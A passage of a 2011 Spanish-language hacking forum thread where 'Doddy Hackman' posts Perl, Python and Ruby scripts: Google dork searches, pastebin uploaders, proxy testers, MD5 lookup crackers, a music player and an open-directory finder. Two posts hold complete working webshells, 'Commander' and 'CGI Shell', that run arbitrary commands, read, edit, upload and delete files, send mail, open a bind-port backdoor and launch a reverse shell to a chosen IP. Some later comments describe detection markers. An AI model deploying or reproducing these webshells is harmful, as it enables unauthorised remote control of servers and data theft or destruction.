$link = '-inurl:(htm|html|php) intitle:index of +last modified +parent directory +description +size +(.txt|.pps|.lit|.odt|.doc|.rtf|.zip|.rar|.pdf|.chm) "'.$test.'"';
}
elsif ($op eq "videos") {
$link = '-inurl:(htm|html|php) intitle:index of +last modified +parent directory +description +size +(.mpg|.avi|.flv|.wmv|.di) "'.$test.'"';
}
elsif ($op eq "torrent") {
$link = "$test filetype:torrent";
} else {
$link = "como aprender a escribir";
}
chomp $link;
my $final = "http://www.google.com.ar/search?q=".$link;
system('start firefox "'.$final.'"');
}

# The End ?
#346
Scripting / [Python] PasteBin Uploader
16 Octubre 2011, 02:52 AM
Un simple programa para subir codigos a pastebin

Código (python) [Seleccionar]

#!usr/bin/python
#PasteBin Uploader (C) Doddy Hackman 2011

import urllib2,sys,re

nave = urllib2.build_opener()
nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]

def tomar(web,vars) :
return nave.open(web,vars).read()

def head():
print "\n-- == PasteBin Uploader == --\n\n"

def copyright():
print "\n(C) Doddy Hackman 2011\n"
sys.exit(1)

def sintax():
print "[+] paste.py <file> <title> <perl/python/ruby/php>\n"

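def chubir(file,title,type):
    """Upload the contents of `file` to pastebin and print the returned text.

    file  -- path of the file to upload
    title -- paste name
    type  -- paste format (perl/python/ruby/php, per the usage line)

    The request goes over plain HTTP and sets paste_private=public, so the
    uploaded content is visible to anyone and readable in transit; do not use
    it for files that contain credentials or other secrets.
    """
    import urllib  # local import: only this function needs urlencode

    print "[+] Uploading file\n"
    try:
        with open(file,"r") as handle:
            lin = handle.read()
    except IOError:
        print "[-] Error open file\n"
        copyright()

    # urlencode escapes each field; with plain concatenation any '&', '=' or
    # '+' inside the file or the title changed the form that was submitted.
    campos = urllib.urlencode([
        ("paste_code", lin),
        ("paste_name", title),
        ("paste_format", type),
        ("paste_expire_date", "N"),
        ("paste_private", "public"),
        ("submit", "submit"),
    ])

    try:
        code = tomar("http://pastebin.com/api_public.php",campos)
    except (urllib2.URLError, IOError):
        print "[-] Page offline\n"
        # Without a response there is nothing to inspect; the original went on
        # and failed on the undefined `code`.
        return

    if "Bad API request" in code:
        print "[-] Error uploading file\n"
    else:
        print "[+] Enjoy : ",code+"\n"
        copyright()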

head()
if len(sys.argv) != 4 :
sintax()
else :
chubir(sys.argv[1],sys.argv[2],sys.argv[3])
copyright()

# The End

#347
Scripting / [Python] Proxy Tester
16 Octubre 2011, 02:52 AM
Un simple programa para testear proxies

Código (python) [Seleccionar]

#!usr/bin/python
#Proxy Tester (C) Doddy Hackman 2011

import urllib2,sys


def toma(web) :
return nave.open(web).read()

def header() :
print "\n\n--== Proxy Tester ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2011\n"
sys.exit(1)

def sintax() :
print "\n[*] Sintax : ",sys.argv[0]," <file>"

def testar(host):
try:
  proxy = urllib2.ProxyHandler({"http":host})
  nave = urllib2.build_opener(proxy)
  nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]
  urllib2.install_opener(nave)
  urllib2.urlopen("http://127.0.0.1/sql.php")#
  print "[+] Proxy Found : "+host
except:
  pass

header()
if len(sys.argv) != 2 :
sintax()
else :
print "\n[+] Opening file\n\n"
try:
  hosts = open(sys.argv[1], "r").readlines()
except :
  print "\n[-] Error opening file\n"
for host in hosts:
  host = host.replace("\r","").replace("\n","")
  testar(host)
copyright()

#  The End
#348
Scripting / [Python] Simple Crack Hash
16 Octubre 2011, 02:51 AM
Un simple programa para crackear hashes md5

Código (python) [Seleccionar]

#Simple Crack Hash
#(C) DOddy Hackman 2011
#Test with 202cb962ac59075b964b07152d234b70:123

import urllib2,re,sys

nave = urllib2.build_opener(urllib2.HTTPCookieProcessor())
nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]


def head():
print "\n\n== -- Crack Hash -- ==\n\n"

def copyright():
print "\n\n(C) Doddy HAckman 2011\n"

def uso():
print "\n[+] crackhash.py <hash>\n\n"

def crack(passw):
print "\n[+] Cracking...\n\n"
code = toma("http://md5.hashcracking.com/search.php?md5="+passw)
if re.findall("Cleartext of (.*) is (.*)",code):
  control = re.findall("Cleartext of (.*) is (.*)",code)
  print "[+] Password : "+control[0][1]
else:
  print "\n[-] Not Found\n\n"
   
def toma(web):
return nave.open(web).read()

head()

if len(sys.argv) == 2 :
crack(sys.argv[1])
else:
uso()

copyright()
#349
Scripting / [Ruby] PassChecker
16 Octubre 2011, 02:50 AM
Un simple programa para crackear hashes md5

Código (ruby) [Seleccionar]


#!usr/bin/ruby
#PassChecker (C) Doddy Hackman 2011

require 'net/http'

def toma(web)
  return Net::HTTP.get_response(URI.parse(web)).body
  end

def uso()
print "\n[+] pass.rb <hash>\n"
end


def head()
 print "\n\n -- == PassChecker == --\n\n\n"
end

def copyright()
  print "\n\n\n(C) Doddy Hackman 2011\n\n"
  exit(1)
end

def crack(hash)

if hash.length == 32
 print "\n[+] Cracking hash #{hash}\n\n"
 begin
 code = toma("http://victorov.su/md5/?md5e=&md5d="+hash)
 if code=~/MD5 ðàñøèôðîâàí: <b>(.*)<\/b>/
  print "\n[+] Hash : "+$1+"\n"
 else
  print "\n[-] Pass not crack\n"
  end
 rescue
 print "\n[-] Page offline\n"
 end
else
 print "\n[-] Dont Hash\n\n"
end


end


head()
if !ARGV[0]
uso()
else
crack(ARGV[0])  
end
copyright()
#350
Scripting / [Ruby] PasteBin Uploader
16 Octubre 2011, 02:50 AM
Un simple programa para subir codigos a pastebin

Código (ruby) [Seleccionar]

#!usr/bin/ruby
#PasteBin Uploader  (C) Doddy Hackman 2011

require "net/http"

def head()
print "\n\n-- == PasteBin Uploader\n\n\n"
end

def copyright()
print "\n\n(C) Doddy Hackman 2011\n\n"
exit(1)
end

def uso()
print "\n[+] up.rb <file> <titulo> <tipo>\n"
end

def tomar(web,par)
   return Net::HTTP.post_form(URI.parse(web),par).body
   end

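# Upload the contents of +file+ to pastebin under +titulo+, highlighted as
# +tipo+, and print the text the service returns.
#
# The request goes over plain HTTP with paste_private=public: the content is
# world-readable once uploaded and readable in transit, so this is not for
# files that hold credentials or other secrets.
def subir(file,titulo,tipo)

  begin
    # File.read opens, reads and closes; the original left the handle open.
    contenido = File.read(file)
  rescue StandardError
    print "\n[-] Error open file\n"
    # Nothing to upload; the original carried on with an empty paste_code.
    return
  end

  print "[+] Uploading file\n\n"

  # paste_code is sent as one string; the original passed the array of lines.
  code = tomar("http://pastebin.com/api_public.php",{"paste_code" =>contenido,"paste_name"=>titulo,"paste_format"=>tipo,"paste_expire_date"=>"N","paste_private"=>"public","submit"=>"submit"})

  if code=~/Bad API request/
    print "[-] Error uploading\n"
  else
    print "[+] Enjoy : "+code+"\n"
  end
end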

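file = ARGV[0]
titulo = ARGV[1]
tipo = ARGV[2]

head()
# All three arguments are required. The original condition joined the checks
# with `and`, so the usage text appeared only when every argument was missing
# and a partial command line went on to upload with nil fields.
if !file or !titulo or !tipo
  uso()
else
  subir(file,titulo,tipo)
end
copyright()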

# ¿ The End ?
#351
Scripting / [Ruby] Proxy Tester
16 Octubre 2011, 02:49 AM
Un simple programa para testear proxies

Código (ruby) [Seleccionar]

#!usr/bin/ruby
#ProxyTester (C) Doddy Hackman 2011

require 'net/http'


def uso
  print "\n[+] proxy.rb <file>\n"
end

def head()
  print "\n\n -- == Proxy Tester == --\n\n"
end

def copyright()
   print "\n\n(C) Doddy Hackman 2011\n\n"
   exit(1)
end

# Split a "host:port" line and report the pair when a GET issued through
# Net::HTTP succeeds. Any exception (refused connection, timeout) is swallowed
# by the empty rescue, so unreachable entries are skipped silently.
def testar(tengo)

if tengo=~/(.*):(.*)/
host = $1
port = $2
begin

# NOTE(review): `proxy=host` and `proxy_port=port` are local assignments, not
# keyword arguments, so this is Net::HTTP.new(host, port): the request below is
# sent directly to host:port rather than through it as a proxy.
new = Net::HTTP.new(proxy=host,proxy_port=port)
code = new.get("http://127.0.0.1/sql.php")#http://www.petardas.com
case code
  when Net::HTTPSuccess
  print "[Proxy Found] : #{host}:#{port}\n"
end
rescue
end
end
end


head()
if !ARGV[0]
  uso()
else
archivo = File.open(ARGV[0])
print "\n[+] Scanning file\n\n\n"
lineas = archivo.readlines
lineas.each {
|linea|
linea = linea.chomp
testar(linea) #funcion
}
archivo.close
copyright() 
end
copyright()

# ¿ The End ?
#352
Scripting / [Perl] Commander
14 Octubre 2011, 15:28 PM
Bueno, este programa es un webserver en perl con las siguientes opciones

* Listar directorios
* Ver archivos
* Borrar directorios y archivos
* ReverseShell
* BindPort


Código (perl) [Seleccionar]
#!usr/bin/perl
#
#C0mmand3r (C) Doddy HAckman 2011
#Version 0.1
#
#A simple WebShell in Perl
#
#

use IO::Socket;
use CGI;
use Cwd;
use HTML::Entities;
use URI::Escape;
use Win32;
use Net::hostent;

my $port = rep();

# Port to listen on: the first command-line argument as an integer, or 666
# when no (or a false) argument was given.
sub rep {
    my $requested = $ARGV[0];
    return $requested ? int($requested) : int("666"); #Your Can Edit 666
}

print "\n\n#########################################\n\n";
print "C0mmand3r (C) Doddy HAckman 2011\n\n\n";
print "[+] Starting the webshell on port $port\n\n";
print "#########################################\n\n";


my $sock = new IO::Socket::INET(
LocalHost => 'localhost',
LocalPort => $port,
Proto     => 'tcp',
Listen    => SOMAXCONN,
Reuse     => 1);


while ($jebus = $sock->accept()) {


print $jebus "HTTP/1.1 200/OK\r\nContent-type:text/html\r\n\r\n";
#print $jebus "HTTP/1.1 200/OK\r\nContent-type:application/w-www-form-urlencoded\r\n\r\n";
next if $slave=fork;

close $sock;

while ($response = <$jebus>) {

chomp($response);

my %rta;


if ($response=~/GET/ig) {
capturar($response);
}


# Parse one request line of the form "GET /...?name=value[&name=value] HTTP/1.1"
# and store the parameters in %rta. At most two parameters are recognised, and
# the values are stored exactly as received (URL-decoding, where it happens, is
# done by the code that reads %rta).
# Defender note: %rta is the only input of the handlers that follow, and
# nothing in this parser or around it checks who sent the request; the
# parameter names it accepts (cmd, loadfile, loadir, delfile, deldir,
# ipconnect, port, portbind) are what to look for in captured request lines.
sub capturar {
my $aa = shift;
chomp $aa;
if ($aa=~/GET \/(.*) HTTP\/1.1/ig) {
my $todo = $1;
# Two-parameter form first ...
if ($todo=~/\?(.*)=(.*)&(.*)=(.*)/ig) {
$rta{$1} = $2;
$rta{$3} = $4;
}
# ... then the generic single name=value form.
if ($todo=~/\?(.*)=(.*)/ig) {
$rta{$1} = $2;
}
}


}

print $jebus "

<html><body><title>Commander (C) Doddy Hackman 2011</title>

<style type=text/css>

.main {
margin : -287px 0px 0px -490px;
border : White solid 1px;
BORDER-COLOR: cyan;
}


#pie {
position: absolute;
bottom: 0;
}

body,a:link {
background-color: #000000;
color:cyan;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:cyan;
border: solid 1px cyan;
border-color:cyan
}

a:link,a:visited,a:active {
color: cyan;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>


<h2><center>Commander WebShell</center></h2>

";


if ($rta{'loadfile'}) {

my $file = uri_unescape($rta{'loadfile'});


print $jebus "<br><h2><center>File ".$file."</h2></center><br><br>";

if (-f $file) {

print $jebus "<center><textarea name=codefile cols=70 rows=70>";

open (FILE,$file);
@words = <FILE>;
close FILE;

for (@words) {
print $jebus HTML::Entities::encode($_);
}
print $jebus "
</textarea></center>
</center><br><br>
</form>
";

exit(1);
}
}

print $jebus "
<br><br>
<b>Console</b>
<br><br>
<fieldset>";


if ($rta{'cmd'}) {
print $jebus qx($rta{'cmd'});
}


elsif ($rta{'loadir'}) {
my $dir = uri_unescape($rta{'loadir'});
print "recibi $dir\n\n";
if (-d $dir) {
opendir DIR,$dir;
my @archivos = readdir DIR;
close DIR;

for(@archivos) {

if (-d $_) {
print $jebus "<b>".$_."</b><br>";
} else {
print $jebus $_."<br>";
}}}}

elsif ($rta{'delfile'}) {

my $file = uri_unescape($rta{'delfile'});


if (-f $file) {

if (unlink($file)) {
print $jebus "<script>alert('File Deleted');</script>";
} else {
print $jebus "<script>alert('Error');</script>";
}
}
}

elsif ($rta{'deldir'}) {

my $dir = uri_unescape($rta{'deldir'});

if (-d $dir) {
if (rmdir($dir)) {
print $jebus "<script>alert('Directory Deleted');</script>";
} else {
print $jebus "<script>alert('Error');</script>";
}
}
}

elsif ($rta{'ipconnect'}) {
print $rta{'ipconnect'}."\n";
print $rta{'port'}."\n";
conectar($rta{'ipconnect'},$rta{'port'});
tipo();

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root(); 
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}
}

elsif($rta{'portbind'}) {

$backdoor = IO::Socket::INET->new(
Proto     => 'tcp',
LocalPort => $rta{'portbind'},
Listen    => SOMAXC,
Reuse     => 1);


while ($jesus = $backdoor->accept()) {
$jesus->autoflush(1);
print $jesus "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : ".$$."\n\n";
print $jesus "Welcome  ".$jesus->peerhost."\n\n";
&extras;
$dir = getcwd();
print $jesus $dir.">>";
while (<$jesus>) {
my $yeah = qx($_);
print $jesus "\n\n".$yeah."\n\n";
print $jesus $dir.">>";
}
}

sub extras {

if ($^O =~//ig) {
print $jesus "[+] Domain Name : ".Win32::DomainName()."\n";
print $jesus "[+] OS Version : ".Win32::GetOSName()."\n";
print $jesus "[+] Username : ".Win32::LoginName()."\n\n\n";
} else {
$s =  qx("uname -a");
print $jesus "--==System Info==--\n\n".$s;
}
}
} else {

opendir DIR,getcwd();
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print $jebus "<b>".$_."</b><br>";
} else {
print $jebus $_."<br>";
}}

}

print $jebus "</fieldset>
<br><br>
<form action='' method=GET>
<b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br>
</form>
<form action='' method=GET>
<B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del>
</form>
<form action='' method=GET>
<b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del>
</form>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>Your IP</B> : <input type=text name=ipconnect value=localhost><br>
<b>Port</b> : <input type=text name=port value=666><br>
<br><input type=submit value=Connect></form><br><br>

<b>BindPort</b><br><br>
<form action='' method=GET>
<b>Port</b> : <input type=text name=portbind value=666><br>
<br><input type=submit value=Bind></form><br><br>


</body></html>
";

$jebus->close;

}

} continue {
$jebus->close;
}

# ¿ The End ? 
#353
Scripting / [Perl] CGI Shell
14 Octubre 2011, 15:27 PM
Hola a todos

Hoy he terminado de hacer una shell en CGI; estas shells se usan en las páginas que permiten ejecutar archivos CGI y tienen el directorio cgi-bin

Esta shell tiene las sig opciones

* Listar directorios
* Ver y editar archivos
* Eliminar archivos y directorios
* ReverseShell
* Subir archivos a un directorio especificado
* Ejecutar comandos
* Enviar mails

Código (perl) [Seleccionar]
#!"\xampp\perl\bin\perl.exe"
#
#CGI Shell 0.1
#
#(C) Doddy Hackman 2011
#
#

use CGI;
use Cwd;
use HTML::Entities;
use Net::SMTP;

# Request state: every CGI parameter name returned by param() is copied into
# %rta. Nothing in this script authenticates the caller or validates these
# values before they reach the file, command, mail and socket operations
# further down, so anyone who can request the script controls all of them.
my %rta;

my $que = new CGI;
my @ques = $que->param;

for(@ques) {
$rta{$_} = $que->param($_);
}


# HTTP header, inline stylesheet and page title. The fixed title and heading
# strings printed here are stable content markers when searching a web root
# or HTTP responses for this file.
print "Content-type:text/html\n\n";
print "

<style type=text/css>


.main {
margin : -287px 0px 0px -490px;
border : White solid 1px;
BORDER-COLOR: #00FF00;
}


#pie {
position: absolute;
bottom: 0;
}

body,a:link {
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:#00FF00;
border: solid 1px #00FF00;
border-color:#00FF00
}

a:link,a:visited,a:active {
color: #00FF00;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>

<title>CGI Shell (C) Doddy Hackman 2011</title>
<h2><center>CGI Shell</center></h2>

";

# Upload handler: when a 'filex' field is present, data read from it in
# 1024-byte chunks is appended to <todir>/<filex>. Both path components come
# straight from the request, the open is the two-argument form, and neither
# open nor print is checked.
# NOTE(review): this relies on the CGI module returning a value for upload
# fields that works both as the file name and as a readable handle -- confirm
# for the CGI.pm version in use.
if ($rta{'filex'}) {

open FILE ,">>".$rta{'todir'}."/".$rta{'filex'};
while($bytes = read($rta{'filex'},$todo, 1024)) {
print FILE $todo;
}
close FILE;

print "<script>alert('File Uploaded');</script>";

}

# Save handler for the editor form: deletes the path named by 'filecode',
# then recreates it containing the submitted 'codefile' text plus a trailing
# newline. The target path is request-controlled and is not confined to any
# directory, so any file the web-server account can write may be replaced.
if ($rta{'codefile'}) {

unlink($rta{'filecode'});

open (FILE,">>".$rta{'filecode'});
print FILE $rta{'codefile'}."\n";
close FILE;

print "<script>alert('File Changed');</script>";

}

# Viewer/editor: if 'loadfile' names a regular file, its contents are shown
# in a textarea whose form posts back to the save handler (fields 'codefile'
# and 'filecode'), and the script exits right after rendering it.
# The file contents are HTML-encoded, but the file name itself is echoed into
# the heading and the hidden field unencoded, and the open uses the
# two-argument form on a request-supplied value.
if ($rta{'loadfile'}) {
print "<form action='' method=POST>";
print "<br><h2><center>File ".$rta{'loadfile'}."</h2></center><br><br>";

if (-f $rta{'loadfile'}) {

print "<center><textarea name=codefile cols=70 rows=70>";

open (FILE,$rta{'loadfile'});
@words = <FILE>;
close FILE;

for (@words) {
print HTML::Entities::encode($_);
}
print "
</textarea></center>
<input type=hidden name=filecode value=".$rta{'loadfile'}.">
<br><br><center><input type=submit value=Save></center><br><br>
</form>
";

# Exit status is 1 even though this is the normal path for the editor view.
exit(1);
}
}

# Console pane: whatever the selected action prints below lands inside this
# fieldset.
print "
<br><br>
<b>Console</b>
<br><br>
<fieldset>";


# Action dispatch: one if/elsif chain, so at most one action runs per
# request. No branch authenticates the caller.

# cmd: the parameter is interpolated into qx(), run as a command line, and
# the output is printed into the page without HTML encoding.
if ($rta{'cmd'}) {
print qx($rta{'cmd'});
}

# mail: submits a message to the SMTP service on localhost. Sender,
# recipient, subject and body all come from the request and are concatenated
# into the message as-is.
elsif ($rta{'mail'}) {

my $send = Net::SMTP->new("localhost",Hello => "localhost",Timeout=>10) or die("[-] Error");
$send->mail($rta{'mail'});
$send->to($rta{'to'});   
$send->data();
$send->datasend("To:".$rta{'to'}."\n"."From:".$rta{'mail'}."\n"."Subject:".$rta{'subject'}."\n".$rta{'body'}."\n\n");
$send->dataend();
$send->quit();

}


# loadir: lists the entries of a request-supplied directory; names are
# printed unencoded.
elsif ($rta{'loadir'}) {

if (-d $rta{'loadir'}) {

opendir DIR,$rta{'loadir'};
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print "<b>".$_."</b><br>";
} else {
print $_."<br>";
}}}}

# delfile: removes the request-supplied path if it is a regular file.
elsif (-f $rta{'delfile'}) {
if (unlink($rta{'delfile'})) {
print "<script>alert('File Deleted');</script>";
} else {
print "<script>alert('Error');</script>";
}
}

# deldir: removes the request-supplied path if it is a directory.
elsif (-d $rta{'deldir'}) {
if (rmdir($rta{'deldir'})) {
print "<script>alert('Directory Deleted');</script>";
} else {
print "<script>alert('Error');</script>";
}
}

# ipconnect: drops a helper script to disk and launches it.
# The single-quoted text assigned to $code is a second Perl program that, per
# its own source, connects out over TCP to the host and port given on its
# command line, points STDIN/STDOUT/STDERR at that socket and then starts
# cmd.exe (Windows) or sh -i (elsewhere).
# Host artefacts visible here: back.pl in the working directory on Windows,
# /tmp/back.pl otherwise, opened in append mode. On a monitored host this
# would presumably also show up as an outbound connection and a command
# interpreter spawned beneath the web-server process.
elsif ($rta{'ipconnect'}) {

$code = '
#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) {
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root(); 
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}

#The End
';

# Choose the drop location by platform and open it for appending.
if ($^O =~/Win32/ig) {
open (FILE,">>"."back.pl");
chmod("back.pl","777");
} else {
open (FILE,">>"."/tmp/back.pl");
chmod("/tmp/back.pl","777");
}

print FILE $code;
close FILE;

# The request's 'ipconnect' and 'port' values are concatenated into the
# system() command string without quoting or validation.
if ($^O == "MSWin32") {
system("back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
} else {
system("cd /tmp;back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
}
# Default view when no action parameter matched: list the script's current
# working directory.
} else {

opendir DIR,getcwd();
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print "<b>".$_."</b><br>";
} else {
print $_."<br>";
}}

}

# Control panel: closes the console fieldset and prints one form per handler.
# Every form except the upload one submits with GET, so the parameter names
# used by the handlers (cmd, loadir, loadfile, delfile, deldir, mail, to,
# subject, body, ipconnect, port) and their values travel in the query
# string, where web-server access logs typically record them.
print "</fieldset>
<br><br>
<form action='' method=GET>
<b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br>
</form>
<form action='' method=GET>
<B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del>
</form>
<form action='' method=GET>
<b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del>
</form>
<form enctype='multipart/form-data' method=POST>
<br><b>Upload File</b> : <input type=file name=filex><br><br>
<b>To dir</b> : <input type=text name=todir value=".getcwd()."><br><br>
<input type=submit value=Upload>
</form>
<br><B>Mailer</b><br><br>
<form action='' method=GET>
<b>Mail</b> : <input type=text name=mail><br>
<b>To</b> : <input type=text name=to><br>
<b>Subject</B> : <input type=text name=subject><br>
<B>Body</B> : <input type=text name=body><br><br>
<input type=submit value=Send>
</form>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>IP</B> : <input type=text name=ipconnect><br>
<b>Port</B> : <input type=text name=port><br>
<br><input type=submit value=Connect></form><br><br>

";


# ¿ The End ?

#354
Scripting / [Perl] DH Player
14 Octubre 2011, 15:26 PM
Bueno, este es un simple reproductor de música que hice en Perl.
En esta versión podrán buscar música y reproducirla, todo en una ventana grosa

Código (perl) [Seleccionar]
#!usr/bin/perl
#DH Player 0.1
#(C) Doddy Hackman 2011

use Tk;
use Win32::MediaPlayer;

# Console handling for Windows. `use` is processed at compile time, so
# Win32::Console is loaded whatever $^O is; only the Free() call is
# conditional.
if ($^O eq 'MSWin32') {
    use Win32::Console;
    Win32::Console::Free();
}

# Player object shared by the play/stop/pause/resume callbacks.
$test = Win32::MediaPlayer->new;

# Colour options common to every widget below.
my @theme = (-background => "black", -foreground => "green");

# Fixed-size main window.
$new = MainWindow->new(-background => "black");
$new->geometry("350x420+20+20");
$new->resizable(0, 0);
$new->title("DH Player 0.1 (C) Doddy Hackman 2011");

# Directory row: label, entry (pre-filled with a hard-coded path) and the
# Search button that fills the list box through buscar().
$new->Label(@theme, -font => "Impact", -text => "Directory : ")
    ->place(-x => "20", -y => "20");
my $dir = $new->Entry(@theme, -text => "C:\\Users\\Daniel\\Desktop\\WarFactory\\Perl\\musica")
    ->place(-x => "100", -y => "25");
$new->Button(@theme, -activebackground => "green", -text => "Search",
    -width => "10", -command => \&buscar)->place(-x => "240", -y => "25");

# Result list.
$new->Label(@theme, -text => "Files Found", -font => "Impact")
    ->place(-y => "95", -x => "120");
my $lists = $new->Listbox(@theme)->place(-y => "130", -x => "100");

# Transport buttons: caption, callback and vertical position of each one.
for my $control (
    [ "Play",   \&play,   "310" ],
    [ "Pause",  \&pause,  "333" ],
    [ "Resume", \&resume, "356" ],
    [ "Stop",   \&stop,   "379" ],
) {
    my ($caption, $handler, $row) = @{$control};
    $new->Button(@theme, -text => $caption, -width => "55",
        -activebackground => "green", -command => $handler)->place(-y => $row);
}


MainLoop;


# Button callback: loads and starts every entry currently selected in the
# list box, resolving each name against the folder typed in the entry widget.
sub play {

    # The lexical on the left only exists from the next statement on, so the
    # right-hand $dir is still the file-level entry widget.
    my $folder = $dir->get;

    # $d stays a package variable, as in the rest of the script.
    $d = $lists->curselection();

    foreach my $index (@{$d}) {
        my $track = $lists->get($index);
        $test->load($folder . "\\" . $track);
        $test->play;
    }

}

# Button callback: calls close on the shared player object and hands back
# whatever that call returns.
sub stop {
    return $test->close;
}

# Button callback: issues one pause request to the shared player per selected
# list entry. The folder and the entry text are fetched but not used.
sub pause {

    my $folder = $dir->get;

    $d = $lists->curselection();

    foreach my $index (@{$d}) {
        my $track = $lists->get($index);
        $test->pause;
    }

}

# Button callback: issues one resume request to the shared player per
# selected list entry. The folder and the entry text are fetched but not used.
sub resume {

    my $folder = $dir->get;

    $d = $lists->curselection();

    foreach my $index (@{$d}) {
        my $track = $lists->get($index);
        $test->resume;
    }

}

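# Search callback: empties the list box and refills it with the regular files
# found directly inside the folder typed in the entry widget.
# If the folder cannot be opened the list is simply left empty.
sub buscar {

    $lists->delete(0.0, "end");

    # The right-hand $dir is the file-level entry widget.
    my $folder = $dir->get;

    # Lexical directory handle, checked on open and released with closedir.
    # The earlier close() on a bareword handle did not close the directory.
    opendir(my $dh, $folder) or return;
    my @entries = readdir $dh;
    closedir $dh;

    for my $entry (@entries) {
        # readdir returns bare names, so test them relative to the folder.
        $lists->insert("end", $entry) if -f $folder . "\\" . $entry;
    }

    return;
}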


# ¿ The End ?



#355
Scripting / [Perl] Finder Paths
14 Octubre 2011, 15:25 PM
Hola, hoy les traigo un programa para buscar los posibles directorios que no están protegidos con index en una página

Código (perl) [Seleccionar]
#!usr/bin/perl
#Finder Paths
#(C) Doddy Hackman 2010

use WWW::Mechanize;
use HTTP::Response;
use URI::Split qw(uri_split);

# Clear the terminal with the command that fits the platform.
system($^O =~/Win32/ig ? "cls" : "clear");

# One shared browser object for every request; autocheck is off, so failed
# fetches return a response instead of dying.
my $new = WWW::Mechanize->new(autocheck => 0);
$new->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

# Banner, then scan the page given on the command line or prompt for one.
head();
if ($ARGV[0]) {
    print "[Page] : $ARGV[0]\n\n";
    scan($ARGV[0]);
}
else {
    menu();
}
finish();

# Interactive entry point: asks for the page on standard input and scans it.
sub menu {
    print "[Page] : ";
    my $pa = <STDIN>;
    chomp $pa;
    scan($pa);
}

# Prints the credit line, waits for one line of input, then ends the program.
# The exit status is 1 on this normal path as well.
sub finish {
    my $credit = "\n\n\n\n(C) Doddy Hackman 2010\n\n";
    print $credit;
    my $ignored = <STDIN>;
    exit(1);
}

# Fetches the page in $_[0], walks the links found on it and reports every
# link directory whose page title contains "Index Of", i.e. a directory the
# server answers with an automatic listing. Hits are printed and appended to
# logs/indexs-found.txt through savefile(). Such hits disappear once
# directory listing is switched off on the server.
#
# NOTE(review): $_[0] aliases the caller's variable and is rewritten in place
# inside the loop, so the caller's URL is modified as a side effect.
sub scan {
# Declared but never used below.
my @analizar;
# Result discarded; the fetch makes this page the browser object's current
# page so that dame_link() can return its links.
toma($_[0]);
print "\n\n[Target confirmed] : $_[0]\n\n";
print "[Status] : Scanning\n";
# @links, $code and $ok are package variables (no `my`).
@links = dame_link();
for my $junt(@links) {
